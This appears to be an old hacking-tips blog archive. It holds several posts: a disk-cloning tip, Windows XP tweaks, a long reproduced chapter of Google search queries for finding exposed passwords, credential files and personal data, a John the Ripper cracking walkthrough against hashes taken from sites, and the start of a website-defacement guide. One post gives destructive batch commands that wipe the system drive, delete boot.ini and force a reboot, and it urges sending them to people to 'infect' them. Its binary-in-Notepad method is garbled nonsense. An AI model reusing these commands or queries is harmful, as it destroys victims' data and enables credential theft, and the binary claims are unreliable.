If the client changes his DNS Server to an Internet DNS server, it bypasses the entries for the hijacked domains. However, if the client is on an Active Directory domain, he will lose access to the domain controllers and Active Directory.

Clients can use a web proxy to view desired web content. External web proxies do not rely on the internal DNS server for name resolution.

Clone A HDD witout buying any software

2007-12-09T02:38:00.001-08:00

Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn't know that all that you needed, was already set up on your current system? Well, it is... and if you follow this tut, you shouldn't have much of a problem.

Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".

Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:

Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:

"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.

If you receive an error message, then remove the space from between XCOPY and C:\

Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.

This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn't have any problems. If, by any chance, you should come across a snag, message me and I'll walk you through it.

Format a hdd with notepad

2007-12-09T02:36:00.000-08:00

Step 1.
Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2.
Save As An EXE Any Name Will Do

Step 3.
Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X -- this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest
cant spoonfeed
its workin

Do not try it on ur PC. dont mess around this is for educational purpose only

still if u cant figure it out try dis

go to notepad

@Echo off
Del C:\ *.*y

save it as Dell.bat

worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

20 things you didn't knew about xp

2007-12-09T02:33:00.000-08:00

1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.

6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.

7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.

9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

20. The next release of Windows XP, codenamed Longhorn, is due out late dis month The next big release is codenamed Blackcomb and will be out in 2010/2011

HAcking google for finding passwords and other personal info

2007-12-09T02:28:00.000-08:00

Introduction
This is not about finding sensitive data during an assessment as much as
it is about what the “bad guys” might do to troll for the data.The examples presented
generally represent the lowest-hanging fruit on the security
tree. Hackers target this information on a daily basis.To protect against this type
of attacker, we need to be fairly candid about the worst-case possibilities.We
won’t be overly candid, however.
We start by looking at some queries that can be used to uncover usernames,
the less important half of most authentication systems.The value of a username is
often overlooked, but, an entire multimilliondollar
security system can be shattered through skillful crafting of even the
smallest, most innocuous bit of information.
Next, we take a look at queries that are designed to uncover passwords. Some
of the queries we look at reveal encrypted or encoded passwords, which will take
a bit of work on the part of an attacker to use to his or her advantage.We also
take a look at queries that can uncover cleartext passwords.These queries are some
of the most dangerous in the hands of even the most novice attacker. What could
make an attack easier than handing a username and cleartext password to an
attacker?
We wrap up by discussing the very real possibility of uncovering
highly sensitive data such as credit card information and information used to
commit identity theft, such as Social Security numbers. Our goal here is to
explore ways of protecting against this very real threat.To that end, we don’t go
into details about uncovering financial information and the like. If you’re a “dark
side” hacker, you’ll need to figure these things out on your own.
Searching for Usernames
Most authentication mechanisms use a username and password to protect information.
To get through the “front door” of this type of protection, you’ll need to
determine usernames as well as passwords. Usernames also can be used for social
engineering efforts, as we discussed earlier.
Many methods can be used to determine usernames. In Chapter 10, we
explored ways of gathering usernames via database error messages. In Chapter 8
we explored Web server and application error messages that can reveal various
information, including usernames.These indirect methods of locating usernames
are helpful, but an attacker could target a usernames directory
query like “your username is”. This phrase can locate help pages that describe the
username creation process,
information gleaned from other sources, such as Google Groups posts or phone
listings.The usernames could then be recycled into various other phases of the
attack, such as a worm-based spam campaign or a social-engineering attempt.An
attacker can gather usernames from a variety of sources, as shown in the sample
queries listed
Sample Queries That Locate Usernames
Query Description
inurl:admin inurl:userlist Generic userlist files
inurl:admin filetype:asp Generic userlist files
inurl:userlist
inurl:php inurl:hlstats intext: Half-life statistics file, lists username and
Server Username other information
filetype:ctl inurl:haccess. Microsoft FrontPage equivalent of htaccess
ctl Basic shows Web user credentials
Query Description
filetype:reg reg intext: Microsoft Internet Account Manager can
”internet account manager” reveal usernames and more
filetype:wab wab Microsoft Outlook Express Mail address
books
filetype:mdb inurl:profiles Microsoft Access databases containing (user)
profiles.
index.of perform.ini mIRC IRC ini file can list IRC usernames and
other information
inurl:root.asp?acs=anon Outlook Mail Web Access directory can be
used to discover usernames
filetype:conf inurl:proftpd. PROFTP FTP server configuration file reveals
conf –sample username and server information
filetype:log username putty PUTTY SSH client logs can reveal usernames
and server information
filetype:rdp rdp Remote Desktop Connection files reveal user
credentials
intitle:index.of .bash_history UNIX bash shell history reveals commands
typed at a bash command prompt; usernames
are often typed as argument strings
intitle:index.of .sh_history UNIX shell history reveals commands typed at
a shell command prompt; usernames are
often typed as argument strings
“index of ” lck Various lock files list the user currently using
a file
+intext:webalizer +intext: Webalizer Web statistics page lists Web user-
Total Usernames +intext: names and statistical information
”Usage Statistics for”
filetype:reg reg HKEY_ Windows Registry exports can reveal
CURRENT_USER username usernames and other information

Underground Googling
Searching for a Known Filename
Remember that there are several ways to search for a known filename.
One way relies on locating the file in a directory listing, like intitle:index.of
install.log. Another, often better, method relies on the filetype operator,
as in filetype:log inurl:install.log. Directory listings are not all that
common. Google will crawl a link to a file in a directory listing, meaning
that the filetype method will find both directory listing entries as well as
files crawled in other ways.

In some cases, usernames can be gathered from Web-based statistical programs
that check Web activity.The Webalizer program shows all sorts of information
about a Web server’s usage. Output files for the Webalizer program can be
located with a query such as intext:webalizer intext:”Total Usernames” intext:”Usage
Statistics for”. Among the information displayed is the username that was used to
connect to the Web server, as shown in Figure 9.2. In some cases, however, the
usernames displayed are not valid or current, but the “Visits” column lists the
number of times a user account was used during the capture period.This enables
an attacker to easily determine which accounts are more likely to be valid.

The Windows registry holds all sorts of authentication information, including
usernames and passwords.Though it is unlikely (and fairly uncommon) to locate
live, exported Windows registry files on the Web, at the time of this writing
there are nearly 100 hits on the query filetype:reg HKEY_CURRENT_USER
username, which locates Windows registry files that contain the word username
and in some cases passwords,

As any talented attacker or security person will tell you, it’s rare to get information
served to you on a silver platter. Most decent finds take a bit of persistence,
creativity, intelligence, and just a bit of good luck. For example, consider
the Microsoft Outlook Web Access portal, which can be located with a query
like inurl:root.asp?acs=anon. At the time of this writing, fewer than 50 sites are
returned by this query, even though there a certainly more than 50 sites running
the Microsoft Web-based mail portal. Regardless of how you might locate a site
running this e-mail gateway, it’s not uncommon for the site to host a public
directory (denoted “Find Names,” by default)

The public directory allows access to a search page that can be used to find
users by name. In most cases, wildcard searching is not allowed, meaning that a
search for * will not return a list of all users, as might be expected. Entering a
search for a space is an interesting idea, since most user descriptions contain a
space, but most large directories will return the error message “This query would
return too many addresses!” Applying a bit of creativity, an attacker could begin
searching for individual common letters, such as the “Wheel of Fortune letters”
R, S,T, L, N, and E. Eventually one of these searches will most likely reveal a list
of user information like

Once a list of user information is returned, the attacker can then recycle the
search with words contained in the user list, searching for the words Voyager,
Freshmen, or Campus, for example.Those results can then be recycled, eventually
resulting in a nearly complete list of user information.
Searching for Passwords
Password data, one of the “Holy Grails” during a penetration test, should be protected.
Unfortunately, many examples of Google queries can be used to locate
passwords on the Web, as shown in Table 9.2.
Table 9.2 Queries That Locate Password Information
Query Description
inurl:/db/main.mdb ASP-Nuke passwords
filetype:cfm “cfapplication ColdFusion source with potential passwords
name” password
filetype:pass pass intext:userid dbman credentials
allinurl:auth_user_file.txt DCForum user passwords
eggdrop filetype:user user Eggdrop IRC user credentials
filetype:ini inurl:flashFXP.ini FlashFXP FTP credentials
filetype:url +inurl:”ftp://” FTP bookmarks cleartext passwords
+inurl:”@”
inurl:zebra.conf intext: GNU Zebra passwords
password -sample -test
-tutorial –download
filetype:htpasswd htpasswd HTTP htpasswd Web user credentials
intitle:”Index of” “.htpasswd” HTTP htpasswd Web user credentials
“htgroup” -intitle:”dist”
-apache -htpasswd.c
intitle:”Index of” “.htpasswd” HTTP htpasswd Web user credentials
htpasswd.bak
“http://*:*@www” bob:bob HTTP passwords (bob is a sample username)
“sets mode: +k” IRC channel keys (passwords)
“Your password is * Remember IRC NickServ registration passwords
this for later use”
signin filetype:url JavaScript authentication credentials

Queries That Locate Password Information
Query Description
LeapFTP intitle:”index.of./” LeapFTP client login credentials
sites.ini modified
inurl:lilo.conf filetype:conf LILO passwords
password -tatercounter2000
-bootpwd –man
filetype:config config intext: Microsoft .NET application credentials
appSettings “User ID”
filetype:pwd service Microsoft FrontPage Service Web passwords
intitle:index.of Microsoft FrontPage Web credentials
administrators.pwd
“# -FrontPage-” inurl:service.pwd Microsoft FrontPage Web passwords
ext:pwd inurl:_vti_pvt inurl: Microsoft FrontPage Web passwords
(Service authors administrators)
inurl:perform filetype:ini mIRC nickserv credentials
intitle:”index of” intext: mySQL database credentials
connect.inc
intitle:”index of” intext: mySQL database credentials
globals.inc
filetype:conf oekakibbs Oekakibss user passwords
filetype:dat wand.dat Opera‚ ÄúMagic Wand‚Äù Web credentials
inurl:ospfd.conf intext: OSPF Daemon Passwords
password -sample -test
-tutorial –download
index.of passlist Passlist user credentials
inurl:passlist.txt passlist.txt file user credentials
filetype:dat “password.dat” password.dat files
inurl:password.log filetype:log password.log file reveals usernames, passwords,
and hostnames
filetype:log inurl:”password.log” password.log files cleartext passwords
inurl:people.lst filetype:lst People.lst generic password file
intitle:index.of config.php PHP Configuration File database credentials
inurl:config.php dbuname dbpass PHP Configuration File database credentials
inurl:nuke filetype:sql PHP-Nuke credentials
Queries That Locate Password Information
Query Description
filetype:conf inurl:psybnc.conf psyBNC IRC user credentials
“USER.PASS=”
filetype:ini ServUDaemon servU FTP Daemon credentials
filetype:conf slapd.conf slapd configuration files root password
inurl:”slapd.conf” intext: slapd LDAP credentials
”credentials” -manpage
-”Manual Page” -man: -sample
inurl:”slapd.conf” intext: slapd LDAP root password
”rootpw” -manpage
-”Manual Page” -man: -sample
filetype:sql “IDENTIFIED BY” –cvs SQL passwords
filetype:sql password SQL passwords
filetype:ini wcx_ftp Total Commander FTP passwords
filetype:netrc password UNIX .netrc user credentials
index.of.etc UNIX /etc directories contain various credential
files
intitle:”Index of..etc” passwd UNIX /etc/passwd user credentials
intitle:index.of passwd UNIX /etc/passwd user credentials
passwd.bak
intitle:”Index of” pwd.db UNIX /etc/pwd.db credentials
intitle:Index.of etc shadow UNIX /etc/shadow user credentials
intitle:index.of master.passwd UNIX master.passwd user credentials
intitle:”Index of” spwd.db UNIX spwd.db credentials
passwd -pam.conf
filetype:bak inurl:”htaccess UNIX various password file backups
passwdshadowhtusers
filetype:inc dbconn Various database credentials
filetype:inc intext:mysql_ Various database credentials, server names
connect
filetype:properties inurl:db Various database credentials, server names
intext:password
inurl:vtund.conf intext:pass –cvs Virtual Tunnel Daemon passwords
inurl:”wvdial.conf” intext: wdial dialup user credentials

Queries That Locate Password Information
Query Description
filetype:mdb wwforum Web Wiz Forums Web credentials
“AutoCreate=TRUE password=*”Website Access Analyzer user passwords
filetype:pwl pwl Windows Password List user credentials
filetype:reg reg +intext: Windows Registry Keys containing user
”defaultusername” intext: credentials
”defaultpassword”
filetype:reg reg +intext: Windows Registry Keys containing user
”internet account manager” credentials
“index of/” “ws_ftp.ini” WS_FTP FTP credentials
“parent directory”
filetype:ini ws_ftp pwd WS_FTP FTP user credentials
inurl:/wwwboard wwwboard user credentials
In most cases, passwords discovered on the Web are either encrypted or
encoded in some way. In most cases, these passwords can be fed into a password
cracker such as John the Ripper from www.openwall.com/john to produce
plaintext passwords that can be used in an attack. Figure 9.6 shows the results of
the search ext:pwd inurl:_vti_pvt inurl:(Service authors administrators), which
combines a search for some common

Exported Windows registry files often contain encrypted or encoded passwords
as well. If a user exports the Windows registry to a file and Google subsequently
crawls that file, a query like filetype:reg intext:”internet account manager”
could reveal interesting keys containing password data

ress. Note that live, exported Windows registry files are not very common, but it’s
not uncommon for an attacker to target a site simply because of one exceptionally
insecure file. It’s also possible for a Google query to uncover cleartext passwords.
These passwords can be used as is without having to employ a
password-cracking utility. In these extreme cases, the only challenge is determining
the username as well as the host on which the password can be used. As
shown in Figure 9.8, certain queries will locate all the following information:
usernames, cleartext passwords, and the host that uses that authentication!

There is no magic query for locating passwords, but during an assessment,
remember that the simplest queries directed at a site can have amazing results, as
we discussed in , Chapter 7, Ten Simple Searches. For example, a query like “Your
password” forgot would locate pages that provide a forgotten password recovery
mechanism.The information from this type of query can be used to formulate
any of a number of attacks against a password. As always, effective social engineering
is a terrific nontechnical solution to “forgotten” passwords.
Another generic search for password information, intext:(password passcode
pass) intext:(username userid user), combines common words for passwords and
user IDs into one query.This query returns a lot of results, but the vast majority
of the top hits refer to pages that list forgotten password information, including
either links or contact information. Using Google’s translate feature, found at
http://translate.google.com/translate_t, we could also create multilingual password
searches.Table 9.3 lists common translations for the word password
English Translations of the Word Password
Language Word Translation
German password Kennwort
Spanish password contraseña
French password mot de passe
Italian password parola d’accesso
Portuguese password senha
Dutch password Paswoord
NOTE
The terms username and userid in most languages translate to username
and userid, respectively.
Searching for Credit Card Numbers,
Social Security Numbers, and More
Most people have heard news stories about Web hackers making off with customer
credit card information.With so many fly-by night retailers popping up
on the Internet, it’s no wonder that credit card fraud is so prolific.These momand-
pop retailers are not the only ones successfully compromised by hackers.
Corporate giants by the hundreds have had financial database compromises over
the years, victims of sometimes very technical, highly focused attackers. What
might surprise you is that it doesn’t take a rocket scientist to uncover live credit
card numbers on the Internet, thanks to search engines like Google. Everything
from credit information to banking data or supersensitive classified government
documents can be found on the Web. Consider the (highly edited) Web page

This document, found using Google, lists hundreds and hundreds of credit
card numbers (including expiration date and card validation numbers) as well as
the owners’ names, addresses, and phone numbers.This particular document also
included phone card (calling card) numbers. Notice the scroll bar on the righthand
side of Figure 9.9, an indicator that the displayed page is only a small part
of this huge document—like many other documents of its kind. In most cases,
pages that contain these numbers are not “leaked” from online retailers or ecommerce
sites but rather are most likely the fruits of a scam known as phishing,
in which users are solicited via telephone or e-mail for personal information.
Several Web sites, including MillerSmiles.co.uk, document these scams and
hoaxes. Figure 9.10 shows a screen shot of a popular eBay phishing scam that
encourages users to update their eBay profile information.

Once a user fills out this form, all the information is sent via e-mail to the
attacker, who can use it for just about anything.
Tools and Traps
Catching Online Scammers
In some cases, you might be able to use Google to help nab the bad guys.
Phishing scams are effective because the fake page looks like an official
page. To create an official-looking page, the bad guys must have examples
to work from, meaning that they must have visited a few legitimate companies’
Web sites. If the fishing scam was created using text from several
companies’ existing pages, you can key in on specific phrases from the fake
page, creating Google queries designed to round up the servers that hosted
some of the original content. Once you’ve located the servers that contained
the pilfered text, you can work with the companies involved to
extract correlating connection data from their log files. If the scammer visited
each company’s Web page, collecting bits of realistic text, his IP should
appear in each of the log files. Auditors at SensePost (www.sensepost.com)
have successfully used this technique to nab online scam artists.
Unfortunately, if the scammer uses an exact copy of a page from only one
company, this task becomes much more difficult to accomplish.
Social Security Numbers
Social Security numbers (SSNs) and other sensitive data can be easily located
with Google as well as via the same techniques used to locate credit card numbers.
For a variety of reasons, SSNs might appear online—for example, educational
facilities are notorious for using an SSN as a student ID, then posting
grades to a public Web site with the “student ID” displayed next to the grade.A
creative attacker can do quite a bit with just an SSN, but in many cases it helps
to also have a name associated with that SSN. Again, educational facilities have
been found exposing this information via Excel spreadsheets listing student’s
names, grades, and SSNs, despite the fact that the student ID number is often
used to help protect the privacy of the student! Although we don’t feel it’s right
to go into the details of how this data is located, several media outlets have irresponsibly
posted the details online. Although the blame lies with the sites that are
leaking this information, in our opinion it’s still not right to draw attention to
how exactly the information can be located.
Personal Financial Data
In some cases, phishing scams are responsible for publicizing personal information;
in other cases, hackers attacking online retails are to blame for this breach of
privacy. Sadly, there are many instances where an individual is personally responsible
for his own lack of privacy. Such is the case with personal financial information.
With the explosion of personal computers in today’s society, users have
literally hundreds of personal finance programs to choose from. Many of these
programs create data files with specific file extensions that can be searched with
Google. It’s hard to imagine why anyone would post personal financial information
to a public Web site (which subsequently gets crawled by Google), but it
must happen quite a bit, judging by the number of hits for program files generated
by Quicken and Microsoft Money, for example. Although it would be
somewhat irresponsible to provide queries here that would unearth personal
financial data, it’s important to understand the types of data that could potentially
be uncovered by an attacker.To that end,Table 9.4 shows file extensions for various
financial, accounting, and tax return programs. Ensure that these filetypes
aren’t listed on a webserver you’re charged with protecting.
File Extension Description
afm Abassis Finance Manager
ab4 Accounting and Business File
mmw AceMoney File
Iqd AmeriCalc Mutual Fund Tax Report
et2 Electronic Tax Return Security File (Australia)
tax Intuit TurboTax Tax Return
t98-t04 Kiplinger Tax Cut File (extension based on two-digit return
year)
mny Microsoft Money 2004 Money Data Files
mbf Microsoft Money Backup Files
inv MSN Money Investor File
ptdb Peachtree Accounting Database
qbb QuickBooks Backup Files reveal financial data
qdf Quicken personal finance data
soa Sage MAS 90 accounting software
sdb Simply Accounting
stx Simply Tax Form
tmd Time and Expense Tracking
tls Timeless Time & Expense
fec U.S. Federal Campaign Expense Submission
wow Wings Accounting File
Searching for Other Juicy Info
As we’ve seen, Google can be used to locate all sorts of sensitive information. In
this section we take a look at some of the data that Google can find that’s harder
to categorize. From address books to chat log files and network vulnerability
reports, there’s no shortage of sensitive data online.Table 9.5 shows some queries
that can be used to uncover various types of sensitive data.
Query Description
intext:”Session Start AIM and IRC log files
* * * *:*:* *” filetype:log
filetype:blt blt +intext: AIM buddy lists
screenname
buddylist.blt AIM buddy lists
intitle:index.of cgiirc.config CGIIRC (Web-based IRC client) config file,
shows IRC servers and user credentials
inurl:cgiirc.config CGIIRC (Web-based IRC client) config file,
shows IRC servers and user credentials
“Index of” / “chat/logs” Chat logs
intitle:”Index Of” cookies.txt cookies.txt file reveals user information
“size”
“phone * * *” “address *” Curriculum vitae (resumes) reveal names
“e-mail” intitle:”curriculum vitae” and address information
ext:ini intext:env.ini Generic environment data
intitle:index.of inbox Generic mailbox files
“Running in Child mode” Gnutella client data and statistics
“:8080” “:3128” “:80” HTTP Proxy lists
filetype:txt
intitle:”Index of” ICQ chat logs
dbconvert.exe chats
“sets mode: +p” IRC private channel information
“sets mode: +s” IRC secret channel information
“Host Vulnerability Summary ISS vulnerability scanner reports, reveal
Report” potential vulnerabilities on hosts and
networks
“Network Vulnerability ISS vulnerability scanner reports, reveal
Assessment Report” potential vulnerabilities on hosts and networks
filetype:pot inurl:john.pot John the Ripper password cracker results
intitle:”Index Of” -inurl:maillog Maillog files reveals e-mail traffic
maillog size information
ext:mdb inurl:*.mdb inurl: Microsoft FrontPage database folders
Query Description
filetype:xls inurl:contact Microsoft Excel sheets containing contact
information.
intitle:index.of haccess.ctl Microsoft FrontPage equivalent(?)of htaccess
shows Web authentication info
ext:log “Software: Microsoft Microsoft Internet Information Services
Internet Information Services *.*” (IIS) log files
filetype:pst inurl:”outlook.pst” Microsoft Outlook e-mail and calendar
backup files
intitle:index.of mt-db-pass.cgi Movable Type default file
filetype:ctt ctt messenger MSN Messenger contact lists
“This file was generated Nessus vulnerability scanner reports, reveal
by Nessus” potential vulnerabilities on hosts and networks
inurl:”newsletter/admin/” Newsletter administration information
inurl:”newsletter/admin/” Newsletter administration information
intitle:”newsletter admin”
filetype:eml eml intext: Outlook Express e-mail files
”Subject” +From
intitle:index.of inbox dbx Outlook Express Mailbox files
intitle:index.of inbox dbx Outlook Express Mailbox files
filetype:mbx mbx intext:Subject Outlook v1–v4 or Eudora mailbox files
inurl:/public/?Cmd=contents Outlook Web Access public folders or
appointments
filetype:pdb pdb backup (Pilot Palm Pilot Hotsync database files
Pluckerdb)
“This is a Shareaza Node” Shareaza client data and statistics
inurl:/_layouts/settings Sharepoint configuration information
inurl:ssl.conf filetype:conf SSL configuration files, reveal various configuration
information
site:edu admin grades Student grades
intitle:index.of mystuff.xml Trillian user Web links
inurl:forward filetype: UNIX mail forward files reveal e-mail
forward –cvs addresses
intitle:index.of dead.letter UNIX unfinished e-mails

Summary
Make no mistake—there’s sensitive data on the Web, and Google can find it.
There’s hardly any limit to the scope of information that can be located, if only
you can figure out the right query. From usernames to passwords, credit card and
Social Security numbers, and personal financial information, it’s all out there. As a
purveyor of the “dark arts,” you can relish in the stupidity of others, but as a professional
tasked with securing a customer’s site from this dangerous form of
information leakage, you could be overwhelmed by the sheer scale of your
defensive duties.
As droll as it might sound, a solid, enforced security policy is a great way to
keep sensitive data from leaking to the Web. If users understand the risks associated
with information leakage and understand the penalties that come with violating
policy, they will be more willing to cooperate in what should be a security
partnership.
In the meantime, it certainly doesn’t hurt to understand the tactics an adversary
might employ in attacking a Web server. One thing that should become
clear as you read this book is that any attacker has an overwhelming number of
files to go after. One way to prevent dangerous Web information leakage is by
denying requests for unknown file types. Whether your Web server normally
serves up CFM,ASP, PHP, or HTML, it’s infinitely easier to manage what should
be served by the Web server instead of focusing on what should not be served.
Adjust your servers or your border protection devices to allow only specific content
or file types.
Solutions Fast Track
Searching for Usernames
_ Usernames can be found in a variety of locations.
_ In some cases, digging through documents or e-mail directories might
be required.
_ A simple query such as “your username is” can be very effective in
locating usernames.

Searching for Passwords
_ Passwords can also be found in a variety locations.
_ A query such as “Your password” forgot can locate pages that provide a
forgotten-password recovery mechanism.
_ intext:(password passcode pass) intext:(username userid user) is
another generic search for locating password information.
Searching for Credit Cards
Numbers, Social Security Numbers, and More
_ Documents containing credit card and Social Security number
information do exist and are relatively prolific.
_ Some irresponsible news outlets have revealed functional queries that
locate this information.
_ There are relatively few examples of personal financial data online, but
there is a great deal of variety.
_ In most cases, specific file extensions can be searched for.
Searching for Other Juicy Info
_ From address books and chat log files to network vulnerability reports,
there’s no shortage of sensitive data online.

John the ripper tutorial

2007-12-02T01:32:00.001-08:00

inside the file i targeted i found the hashed password like this

blah:S2XSgk2WEfE9w

so saved to list ready to crack , i called mine MD5pass for this lesson

this is what jtr will be cracking,

after you have several passwords to various sites you can begin jtr or just use a single hashed password ..its up to you

now there are many ways to crack the file using jtr am just going to use the basic
one i find the easiest but slowest to use...there are plenty of jtr guides around for more detail cracking modes

common modes are

john -si [passfile]

john -w:[wordlist] [passfile]

john -i [passfile]

there are other modes using digits,alpha,all...they all do the same thing... anyway on to basics

assuming you have john in C:\ directory just type

c:\john -i MD5pass.txt

image 1

after several minutes\hours you should have something like this with cracked passwords if you take a look at the image

after 21 minutes it had cracked 13 of the 36...not bad after 3hrs 24min 18 cracked...half done btw each password cracked is a website....so up to now 18 possible targets

image 2

to check progress hit any key

to stop the cracking hit Ctrl+c session aborted

to view your results type:

c:\john -show MD5pass.txt>result2.txt....this will save the file called result2.txt in the jtr root like this

image 3

you now have the password to gain access to the ftp,or whatever

to resume your cracking

type:

c:\john -restore

will load the remaning uncracked passwords and resume attempts from were it left off

image 4

JTR Commands and Modes

**if you look in the doc folder that came with JTR it gives you details on how to use them**

hope you enjoyed the tutorial...remember if you do gain access to a site\server please inform the admin

i hold no resposibility for your actions

Steps To Deface A Webpage (About Defacers)

2007-12-02T01:30:00.000-08:00

First of all, I do not deface, I never have (besides friends sites as jokes and all in good fun), and never will. So how do I know how to deface? I guess I just picked it up on the way, so I am no expert in this. If I get a thing or two wrong I apoligize. It is pretty simple when you think that defacing is just replacing a file on a computer. Now, finding the exploit in the first place, that takes skill, that takes knowledge, that is what real hackers are made of. I don't encourage that you deface any sites, as this can be used get credit cards, get passwords, get source code, billing info, email databases, etc.. (it is only right to put up some kind of warning. now go have fun ;)

This tutorial will be broken down into 3 main sections, they are as followed:
1. Finding Vuln Hosts.
2. Getting In.
3. Covering Your Tracks

It really is easy, and I will show you how easy it is.

1. Finding Vuln Hosts
